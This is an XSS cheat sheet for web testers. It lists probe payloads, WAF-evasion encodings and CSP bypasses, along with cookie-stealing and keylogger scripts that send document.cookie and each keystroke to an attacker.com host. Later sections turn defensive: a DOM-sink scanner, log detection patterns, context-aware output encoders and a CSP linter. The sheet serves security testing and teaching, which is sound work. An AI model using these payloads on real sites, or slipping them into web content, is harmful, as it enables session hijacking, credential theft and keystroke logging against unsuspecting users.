🌐 Web Vulnerabilities

XSS (Cross-Site Scripting) Cheat Sheet

🎯 Quick Reference

What is XSS?

XSS allows attackers to inject malicious scripts into web pages viewed by other users, potentially stealing cookies, session tokens, or performing actions on behalf of the victim.

Types of XSS

| Type      | Description                                        | Persistence | Detection                      |
| --------- | -------------------------------------------------- | ----------- | ------------------------------ |
| Reflected | Payload in URL/request, reflected immediately      | No          | Check URL parameters           |
| Stored    | Payload stored in database, executed on page load  | Yes         | Check input fields, comments   |
| DOM-based | Payload manipulates DOM client-side                | No          | Check JavaScript, URL fragments |

🔥 Essential Payloads

Basic XSS Probes

html
<!-- Simple alert -->
<script>alert('XSS')</script>
<script>alert(1)</script>
<script>alert(document.domain)</script>

<!-- Event handlers -->
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<select onfocus=alert(1) autofocus>
<textarea onfocus=alert(1) autofocus>
<iframe onload=alert(1)>

<!-- Without parentheses -->
<script>alert`1`</script>
<script>alert(document.domain)</script>

<!-- Polyglot -->
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>

javascript
// Steal cookies and send to attacker server
<script>
fetch('https://attacker.com/steal?cookie=' + document.cookie);
</script>

// Using image tag
<img src=x onerror=this.src='https://attacker.com/steal?cookie='+document.cookie>

// Using XMLHttpRequest
<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://attacker.com/steal?cookie=' + document.cookie);
xhr.send();
</script>

Keylogger Payload

javascript
<script>
document.addEventListener('keypress', function(e) {
    fetch('https://attacker.com/log?key=' + e.key);
});
</script>

🛡️ WAF Bypass Techniques

Case Manipulation

html
<ScRiPt>alert(1)</ScRiPt>
<sCrIpT>alert(1)</sCrIpT>

Character Encoding

html
<!-- HTML Entity Encoding -->
&#60;script&#62;alert(1)&#60;/script&#62;
&lt;script&gt;alert(1)&lt;/script&gt;

<!-- URL Encoding -->
%3Cscript%3Ealert(1)%3C/script%3E

<!-- Unicode -->
\u003cscript\u003ealert(1)\u003c/script\u003e

<!-- Hex Encoding -->
<script>eval('\x61\x6c\x65\x72\x74\x28\x31\x29')</script>

<!-- Octal -->
<script>eval('\141\154\145\162\164\50\61\51')</script>

Comment Tricks

html
<script>al/*comment*/ert(1)</script>
<script>a//comment%0Alert(1)</script>

String Concatenation

javascript
<script>eval('ale'+'rt(1)')</script>
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
<script>Function('ale'+'rt(1)')()</script>

Tag Breaking

html
<img src='x' onerror='alert(1)' <
<svg/onload=alert(1)//
"><script>alert(1)</script>
'><script>alert(1)</script>

🎨 CSP Bypass

JSONP Endpoints

html
<script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1)"></script>

Base Tag Injection

html
<base href="https://attacker.com/">

Angular Template Injection

javascript
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}

Script Gadgets

html
<script src="https://vulnerable-site.com/path?callback=alert"></script>

📝 Real-World Examples

Example 1: Search Box XSS

Scenario: Search parameter reflected in page URL: https://target.com/search?q=<payload>

Test:

  1. https://target.com/search?q=<script>alert(1)</script>
  2. https://target.com/search?q=<img src=x onerror=alert(1)>
  3. https://target.com/search?q="><script>alert(1)</script>

If escaped, try: https://target.com/search?q=%3Cscript%3Ealert(1)%3C/script%3E

Example 2: Stored XSS in Comment

Scenario: User comments stored in database

Payload in comment field:

html
<script>
fetch('https://attacker.com/steal?cookie=' + document.cookie);
</script>

Or event handler:

html
<img src=x onerror="fetch('https://attacker.com/c=' + document.cookie)">

Example 3: DOM XSS via Hash

Scenario: Page uses location.hash unsafely

javascript
document.getElementById('output').innerHTML = location.hash.slice(1);

Exploit URL:
https://target.com/page#<img src=x onerror=alert(1)>
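The defender-side counterpart of Example 3 is finding lines like it before they ship. The following is an added example, not code from the cheat sheet: a small static scan that looks for attacker-controlled DOM sources (location.hash, location.search, window.name, and so on) flowing into HTML or code sinks on the same line, and rates each hit. The sample source it scans is constructed for illustration and includes Example 3's vulnerable line next to its textContent rewrite.

```javascript
// Added example (not the page's code): scan JavaScript source text for DOM XSS
// source-to-sink flows. Single-line matching only; a real tool would track data flow.

// Attacker-controlled DOM sources
const DOM_SOURCES = [
  'location.hash', 'location.search', 'location.href',
  'document.URL', 'document.referrer', 'window.name',
];

// Sinks that interpret a string as HTML or as code
const DOM_SINKS = [
  /\.innerHTML\s*=/, /\.outerHTML\s*=/, /document\.write(ln)?\s*\(/,
  /\beval\s*\(/, /new\s+Function\s*\(/, /\.insertAdjacentHTML\s*\(/,
  /setTimeout\s*\(\s*['"`]/, /setInterval\s*\(\s*['"`]/,
];

// Sinks that treat the value as plain text (safe for untrusted input)
const SAFE_SINKS = [/\.textContent\s*=/, /\.innerText\s*=/];

// Classify one source line; returns a finding or null
function scanLine(line, lineNo) {
  const sources = DOM_SOURCES.filter(s => line.includes(s));
  const sink = DOM_SINKS.find(re => re.test(line));
  const safe = SAFE_SINKS.some(re => re.test(line));
  if (sink && sources.length > 0) {
    // Untrusted data reaches an HTML/code sink on the same line: almost certainly DOM XSS
    return { line: lineNo, severity: 'high', sink: sink.source, sources };
  }
  if (sink) {
    // Dangerous sink with no obvious source: needs manual review of where the value comes from
    return { line: lineNo, severity: 'medium', sink: sink.source, sources: [] };
  }
  if (safe && sources.length > 0) {
    // Untrusted data into a text sink: fine, recorded for completeness
    return { line: lineNo, severity: 'info', sink: 'textContent/innerText', sources };
  }
  return null;
}

function scanSource(source) {
  return source.split('\n').map((l, i) => scanLine(l, i + 1)).filter(Boolean);
}

// Constructed sample source: Example 3's line, its safe rewrite, a constant, and a code sink
const SAMPLE_SOURCE = [
  "const out = document.getElementById('output');",
  "out.innerHTML = location.hash.slice(1);",      // source -> HTML sink: high
  "out.textContent = location.hash.slice(1);",    // source -> text sink: info
  "banner.innerHTML = '<b>Welcome</b>';",         // constant -> HTML sink: medium (review)
  "eval(window.name);",                           // source -> code sink: high
].join('\n');

console.log(scanSource(SAMPLE_SOURCE));
```

Run it over a bundle with `scanSource(fs.readFileSync(path, 'utf8'))`; the `high` findings are the ones to fix first, normally by switching the sink to textContent or by allow-listing the expected values before they reach the DOM.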

🧪 Testing Methodology

Step 1: Identify Input Points

  • URL parameters
  • Form fields
  • HTTP headers
  • File uploads (filename, metadata)
  • Cookie values

Step 2: Test Basic Payloads

html
<script>alert(1)</script>
<img src=x onerror=alert(1)>
"><script>alert(1)</script>
'><script>alert(1)</script>

Step 3: Check Context

  • HTML Context: <script>alert(1)</script>
  • Attribute Context: " onload=alert(1) x="
  • JavaScript Context: ';alert(1);//
  • URL Context: javascript:alert(1)

Step 4: Test Filters

  • Character encoding
  • Tag variations
  • Event handler variations
  • Protocol handlers

Step 5: Craft Final Exploit

  • Bypass detected filters
  • Steal sensitive data
  • Create proof of concept

🔍 Detection Checklist

  • Test all input fields with basic XSS payloads
  • Check URL parameters and fragments
  • Test HTTP headers (User-Agent, Referer, etc.)
  • Check file upload metadata
  • Test stored vs. reflected context
  • Identify JavaScript sinks (innerHTML, eval, etc.)
  • Check for DOM-based XSS
  • Test CSP bypass if present
  • Verify impact (cookie theft, actions, etc.)
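The same checklist, seen from the logging side: the probes in this sheet arrive in access logs in raw, URL-encoded, double-encoded, entity-encoded and mixed-case forms, so a detector has to normalize before it matches. The following is an added example, not part of the original cheat sheet; the log lines are constructed in common access-log format and the indicator patterns are my own choice based on the payload families listed above.

```javascript
// Added example (not the page's code): flag XSS probes in access-log request lines.
// Normalization undoes the encodings from the WAF-bypass section so one pattern set
// covers them; the log lines below are constructed.

const LOG_LINES = [
  '10.0.0.5 - - [01/Jan/2025:10:00:00 +0000] "GET /search?q=laptop HTTP/1.1" 200 512',
  '10.0.0.6 - - [01/Jan/2025:10:00:01 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 640',
  '10.0.0.7 - - [01/Jan/2025:10:00:02 +0000] "GET /search?q=%253Cimg%2520src%3Dx%2520onerror%3Dalert(1)%253E HTTP/1.1" 200 640',
  '10.0.0.8 - - [01/Jan/2025:10:00:03 +0000] "GET /page?u=JaVaScRiPt:alert(1) HTTP/1.1" 302 0',
  '10.0.0.9 - - [01/Jan/2025:10:00:04 +0000] "GET /search?q=%26%2360%3Bsvg%20onload%3Dalert(1)%26%2362%3B HTTP/1.1" 200 640',
  '10.0.0.10 - - [01/Jan/2025:10:00:05 +0000] "GET /search?q=best+onboarding+tips HTTP/1.1" 200 512',
];

// Patterns are matched against the normalized (decoded, lower-cased) request target
const XSS_INDICATORS = [
  { name: 'script-tag',            re: /<\s*\/?\s*script/ },
  { name: 'event-handler',         re: /\bon[a-z]+\s*=/ },
  { name: 'javascript-uri',        re: /javascript\s*:/ },
  { name: 'svg-or-img-tag',        re: /<\s*(svg|img|iframe|body)\b/ },
  { name: 'eval-or-fromcharcode',  re: /\b(eval|string\.fromcharcode)\s*\(/ },
];

// Collapse the encodings an attacker may layer on: repeated percent-decoding
// (handles %253C -> %3C -> <), HTML entities, and JS \u / \x escapes
function normalize(raw) {
  let s = raw;
  for (let i = 0; i < 3; i++) {
    let next;
    try { next = decodeURIComponent(s.replace(/\+/g, ' ')); } catch (e) { break; }
    if (next === s) break;
    s = next;
  }
  s = s.replace(/&#(\d+);/g, (_, n) => String.fromCharCode(parseInt(n, 10)))
       .replace(/&#x([0-9a-f]+);/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
       .replace(/&lt;/gi, '<').replace(/&gt;/gi, '>')
       .replace(/&quot;/gi, '"').replace(/&apos;/gi, "'");
  s = s.replace(/\\u([0-9a-f]{4})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
       .replace(/\\x([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
  return s.toLowerCase();
}

// Pull method and request target out of a combined/common-format log line
function extractRequest(line) {
  const m = line.match(/"([A-Z]+) ([^ "]+) HTTP\/[\d.]+"/);
  return m ? { method: m[1], target: m[2] } : null;
}

function classify(line) {
  const req = extractRequest(line);
  if (!req) return null;
  const normalized = normalize(req.target);
  const hits = XSS_INDICATORS.filter(ind => ind.re.test(normalized)).map(ind => ind.name);
  return { target: req.target, normalized, hits };
}

// Only lines with at least one indicator are returned
function scanLog(lines) {
  return lines.map(classify).filter(r => r && r.hits.length > 0);
}

console.log(scanLog(LOG_LINES));
```

The last constructed line (`best+onboarding+tips`) is there as a false-positive check: "onboarding" contains "on" but is not followed by `=`, so the event-handler pattern does not fire. Alerting on a single hit is noisy on a public search endpoint; a practical rule is to alert when the same client produces several distinct indicator names in a short window, or when a flagged request returns 200 with the payload echoed in the response body (reflected) rather than a 4xx from the WAF.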

🛡️ Prevention

Output Encoding

javascript
// Encode for HTML context
function encodeHTML(str) {
    return str.replace(/[&<>"']/g, (char) => ({
        '&': '&amp;',
        '<': '&lt;',
        '>': '&gt;',
        '"': '&quot;',
        "'": '&#x27;'
    }[char]));
}

// Use in templates
const html = `<div>${encodeHTML(userInput)}</div>`;
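Entity-encoding is only correct for the HTML body context; the attribute, JavaScript-string and URL contexts listed in Step 3 each need their own encoder, and a value dropped into the wrong one is exactly what the context-specific probes above break out of. The following is an added example, not code from the cheat sheet: one encoder per context plus a renderer that picks the right one for each slot. The `renderSearchResult` function and its markup are my own illustration.

```javascript
// Added example (not the page's code): context-aware output encoding.

const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};

// HTML body context: encode the characters that can open a tag, attribute or comment
function encodeHTML(str) {
  return String(str).replace(/[&<>"'\/]/g, ch => HTML_ESCAPES[ch]);
}

// HTML attribute context: encode everything but alphanumerics, so the value cannot
// close the quote and start a new attribute (the `" onload=alert(1) x="` probe)
function encodeAttr(str) {
  return String(str).replace(/[^A-Za-z0-9]/gu,
    ch => '&#x' + ch.codePointAt(0).toString(16) + ';');
}

// JavaScript string context: \xHH / \u{...} escapes keep the `';alert(1);//` probe
// inside the string literal instead of terminating it
function encodeJSString(str) {
  return String(str).replace(/[^A-Za-z0-9]/gu, ch => {
    const cp = ch.codePointAt(0);
    return cp < 0x100 ? '\\x' + cp.toString(16).padStart(2, '0') : '\\u{' + cp.toString(16) + '}';
  });
}

// URL context, as a query value: percent-encode
function encodeURLParam(str) {
  return encodeURIComponent(String(str));
}

// URL context, as a whole href: encoding does not help against `javascript:` URIs,
// so the scheme is checked instead and anything else is replaced by an inert link
function safeHref(url) {
  let parsed;
  try { parsed = new URL(String(url), 'https://example.invalid/'); } catch (e) { return '#'; }
  return (parsed.protocol === 'https:' || parsed.protocol === 'http:') ? String(url) : '#';
}

// Hypothetical renderer: each slot uses the encoder for its own context
function renderSearchResult(query, link) {
  return `<div data-q="${encodeAttr(query)}">` +
         `<a href="${encodeAttr(safeHref(link))}">${encodeHTML(query)}</a>` +
         `<script>var q = '${encodeJSString(query)}';</script>` +
         `</div>`;
}

console.log(renderSearchResult('"><script>alert(1)</script>', 'javascript:alert(1)'));
```

Two points the code makes explicit: `encodeHTML` is not enough for attributes (an unquoted attribute is broken by a space, which `encodeHTML` leaves alone), and no encoder saves an `href` that an attacker can start with `javascript:`; that case is an allow-list on the scheme, not an encoding problem.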

Content Security Policy

http
Content-Security-Policy: default-src 'self'; script-src 'self'
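Whether a policy actually blocks the CSP bypasses listed earlier (JSONP on an allowed host, `<base>` injection, inline handlers) depends on a handful of directives and source values. The following is an added example, not part of the cheat sheet: a parser for the header plus a linter that reports the settings those bypasses rely on. The page's own header is checked alongside a constructed weak policy and a constructed stricter one; the finding texts are mine.

```javascript
// Added example (not the page's code): lint a Content-Security-Policy header.

// Split "directive value value; directive value" into { directive: [values] }
function parseCSP(header) {
  const policy = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...values] = tokens;
    policy[name.toLowerCase()] = values;
  }
  return policy;
}

function lintCSP(header) {
  const policy = parseCSP(header);
  const findings = [];

  const defaultSrc = (policy['default-src'] || []).map(v => v.toLowerCase());
  if (defaultSrc.includes('*')) {
    findings.push('default-src *: every resource type without its own directive is unrestricted');
  }

  // script-src falls back to default-src when absent
  const scriptSrc = policy['script-src'] || policy['default-src'];
  if (!scriptSrc) {
    findings.push('no script-src or default-src: scripts from any origin are allowed');
  } else {
    const vals = scriptSrc.map(v => v.toLowerCase());
    const hasNonceOrHash = vals.some(v => v.startsWith("'nonce-") || v.startsWith("'sha256-"));
    if (vals.includes("'unsafe-inline'") && !hasNonceOrHash) {
      findings.push("script-src allows 'unsafe-inline' without a nonce or hash: injected <script> and event handlers run");
    }
    if (vals.includes("'unsafe-eval'")) {
      findings.push("script-src allows 'unsafe-eval': eval/Function-based payloads run");
    }
    if (vals.includes('*') || vals.includes('https:') || vals.includes('http:')) {
      findings.push('script-src allows scripts from any host');
    }
    if (vals.includes('data:')) {
      findings.push('script-src allows data: URIs');
    }
    for (const v of vals) {
      if (v.startsWith('*.') || v.startsWith('https://*.')) {
        findings.push(`script-src allows a wildcard host (${v}): any JSONP endpoint or script gadget under it can be loaded`);
      }
    }
  }

  // object-src also falls back to default-src; base-uri does not
  if (!policy['object-src'] && !policy['default-src']) {
    findings.push('no object-src: plugin content is unrestricted');
  }
  if (!policy['base-uri']) {
    findings.push('no base-uri: <base href> injection can redirect relative script URLs');
  }
  return findings;
}

// The page's header, a constructed weak policy, and a constructed stricter one
const PAGE_CSP   = "default-src 'self'; script-src 'self'";
const WEAK_CSP   = "default-src *; script-src 'self' 'unsafe-inline' https://*.googleapis.com data:";
const STRICT_CSP = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'";

for (const csp of [PAGE_CSP, WEAK_CSP, STRICT_CSP]) {
  console.log(csp, '\n  ->', lintCSP(csp));
}
```

On the page's own header the linter reports one thing: `base-uri` is missing, which is what the Base Tag Injection bypass above exploits. Adding `base-uri 'none'` (or `'self'`) closes it without touching script loading.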

HTTPOnly Cookies

http
Set-Cookie: sessionid=abc123; HttpOnly; Secure; SameSite=Strict

Safe Sinks

javascript
// Avoid dangerous sinks
element.innerHTML = userInput; // ❌ Dangerous

// Use safe alternatives
element.textContent = userInput; // ✅ Safe
element.setAttribute('data-value', userInput); // ✅ Safe

🔗 Quick Commands

Burp Suite Intruder

Position: §<script>alert(1)</script>§
Payload: XSS payloads list
Grep: <script>, onerror, onload

Browser Console Testing

javascript
// Test inline
document.body.innerHTML += '<img src=x onerror=alert(1)>';

// Test DOM XSS
location.hash = '<img src=x onerror=alert(1)>';

📚 Tools

  • XSStrike: Automated XSS detection
  • Dalfox: Fast XSS scanner
  • XSSer: XSS exploitation tool
  • Burp Suite: Manual testing
  • OWASP ZAP: Automated scanning

💡 Pro Tips

  1. Always URL encode payloads when testing in URLs
  2. Test different contexts: HTML, attribute, JavaScript, URL
  3. Check for DOM sinks: innerHTML, eval, document.write
  4. Bypass CSP with JSONP or script gadgets
  5. Use polyglots for multi-context exploitation
  6. Chain with other bugs: CSRF + XSS = Account takeover
  7. Test file uploads: SVG files can contain XSS
  8. Check mobile apps: WebViews often vulnerable

Only test XSS on:

  • ✅ Your own applications
  • ✅ Bug bounty programs (in scope)
  • ✅ Practice labs (DVWA, Juice Shop)
  • ❌ Never on unauthorized targets

Created for educational purposes only. Use responsibly!